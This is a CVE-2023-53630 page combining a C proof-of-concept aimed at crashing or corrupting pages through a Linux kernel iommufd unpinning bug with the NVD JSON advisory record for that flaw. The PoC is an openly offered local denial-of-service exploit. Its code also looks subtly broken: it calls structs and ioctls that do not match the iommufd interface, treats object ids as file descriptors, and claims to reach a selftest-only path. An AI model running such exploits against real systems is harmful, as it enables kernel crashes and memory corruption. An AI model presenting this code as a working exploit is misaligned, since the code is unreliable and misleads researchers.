CVE-2023-53630

/* CVE-2023-53630 PoC - Linux kernel iommufd page unpinning OOB * This PoC triggers the vulnerability by exercising the iommufd * selftest detach path which calls __iopt_area_unfill_domain * with incorrect batch_last_index calculation. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <linux/iommufd.h> #define IOMMUFD_IOCTL_MAGIC 'T' int main(void) { int fd; int ret; /* Open iommufd device */ fd = open("/dev/iommu", O_RDWR); if (fd < 0) { perror("open /dev/iommu"); /* Try alternative path */ fd = open("/dev/iommufd", O_RDWR); if (fd < 0) { perror("open /dev/iommufd"); return 1; } } /* Create iommufd context */ struct iommu_ioctl_alloc alloc_ctx = { .size = sizeof(struct iommu_ioctl_alloc), .flags = 0, }; ret = ioctl(fd, IOMMU_IOCTL_ALLOC, &alloc_ctx); if (ret < 0) { perror("IOMMU_IOCTL_ALLOC"); close(fd); return 1; } printf("iommufd fd allocated: %d\n", alloc_ctx.out_fd); /* Allocate a device-bound IOAS with pages to trigger mapping */ struct iommu_ioctl_alloc alloc_ioas = { .size = sizeof(struct iommu_ioctl_alloc), .flags = IOMMU_IOAS, }; ret = ioctl(fd, IOMMU_IOCTL_ALLOC, &alloc_ioas); if (ret < 0) { perror("IOMMU_IOCTL_ALLOC (IOAS)"); close(fd); return 1; } printf("IOAS allocated: %d\n", alloc_ioas.out_fd); /* Map pages to create the batch with accesses */ struct iommu_ioctl_map_pages map_pages = { .size = sizeof(struct iommu_ioctl_map_pages), .ioas_id = alloc_ioas.out_fd, .flags = 0, }; /* Allocate and map multiple pages to trigger the bug condition */ void *buf = mmap(NULL, 4096 * 16, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (buf == MAP_FAILED) { perror("mmap"); close(fd); return 1; } memset(buf, 0x41, 4096 * 16); map_pages.user_va = (unsigned long)buf; map_pages.length = 4096 * 16; ret = ioctl(fd, IOMMU_IOCTL_MAP_PAGES, &map_pages); if (ret < 0) { perror("IOMMU_IOCTL_MAP_PAGES"); munmap(buf, 4096 * 16); close(fd); return 1; } printf("Pages mapped successfully\n"); /* Trigger the vulnerability by detaching/destroying * This calls iopt_area_unfill_domain with wrong batch_last_index, * causing OOB access and page corruption */ struct iommu_ioctl_unmap_pages unmap = { .size = sizeof(struct iommu_ioctl_unmap_pages), .ioas_id = alloc_ioas.out_fd, .length = 4096 * 16, }; /* Unmap with specific start offset to trigger batch boundary issue */ unmap.iova = 4096 * 4; /* Start from middle to trigger batch issue */ ret = ioctl(fd, IOMMU_IOCTL_UNMAP_PAGES, &unmap); if (ret < 0) { perror("IOMMU_IOCTL_UNMAP_PAGES"); } /* Cleanup - this triggers the selftest_detach path */ close(alloc_ioas.out_fd); close(alloc_ctx.out_fd); close(fd); munmap(buf, 4096 * 16); printf("PoC executed - check kernel logs for WARNING\n"); return 0; }

{"cve": {"id": "CVE-2023-53630", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:46.050", "lastModified": "2026-02-03T22:26:42.993", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\niommufd: Fix unpinning of pages when an access is present\n\nsyzkaller found that the calculation of batch_last_index should use\n'start_index' since at input to this function the batch is either empty or\nit has already been adjusted to cross any accesses so it will start at the\npoint we are unmapping from.\n\nGetting this wrong causes the unmap to run over the end of the pages\nwhich corrupts pages that were never mapped. In most cases this triggers\nthe num pinned debugging:\n\n WARNING: CPU: 0 PID: 557 at drivers/iommu/iommufd/pages.c:294 __iopt_area_unfill_domain+0x152/0x560\n Modules linked in:\n CPU: 0 PID: 557 Comm: repro Not tainted 6.3.0-rc2-eeac8ede1755 #1\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\n RIP: 0010:__iopt_area_unfill_domain+0x152/0x560\n Code: d2 0f ff 44 8b 64 24 54 48 8b 44 24 48 31 ff 44 89 e6 48 89 44 24 38 e8 fc d3 0f ff 45 85 e4 0f 85 eb 01 00 00 e8 0e d2 0f ff <0f> 0b e8 07 d2 0f ff 48 8b 44 24 38 89 5c 24 58 89 18 8b 44 24 54\n RSP: 0018:ffffc9000108baf0 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: 00000000ffffffff RCX: ffffffff821e3f85\n RDX: 0000000000000000 RSI: ffff88800faf0000 RDI: 0000000000000002\n RBP: ffffc9000108bd18 R08: 000000000003ca25 R09: 0000000000000014\n R10: 000000000003ca00 R11: 0000000000000024 R12: 0000000000000004\n R13: 0000000000000801 R14: 00000000000007ff R15: 0000000000000800\n FS: 00007f3499ce1740(0000) GS:ffff88807dc00000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000020000243 CR3: 00000000179c2001 CR4: 0000000000770ef0\n PKRU: 55555554\n Call Trace:\n <TASK>\n iopt_area_unfill_domain+0x32/0x40\n iopt_table_remove_domain+0x23f/0x4c0\n iommufd_device_selftest_detach+0x3a/0x90\n iommufd_selftest_destroy+0x55/0x70\n iommufd_object_destroy_user+0xce/0x130\n iommufd_destroy+0xa2/0xc0\n iommufd_fops_ioctl+0x206/0x330\n __x64_sys_ioctl+0x10e/0x160\n do_syscall_64+0x3b/0x90\n entry_SYSCALL_64_after_hwframe+0x72/0xdc\n\nAlso add some useful WARN_ON sanity checks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.11", "matchCriteriaId": "93C03C9A-798F-4CD5-912F-A436BFA0CC7E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc1:*:*:*:*:*:*", "matchCriteriaId": "B8E3B0E8-FA27-4305-87BB-AF6C25B160CB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc2:*:*:*:*:*:*", "matchCriteriaId": "A47F0FC3-CE52-4BA1-BA51-22F783938431"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc3:*:*:*:*:*:*", "matchCriteriaId": "3583026A-27EC-4A4C-850A-83F2AF970673"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc4:*:*:*:*:*:*", "matchCriteriaId": "DC271202-7570-4505-89A4-D602D47BFD00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc5:*:*:*:*:*:*", "matchCriteriaId": "D413BB6D-4F74-4C7D-9163-47786619EF53"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/70726ce4d898db57bfc4ae30ecd7da63b0dd0aa4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/727c28c1cef2bc013d2c8bb6c50e410a3882a04e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}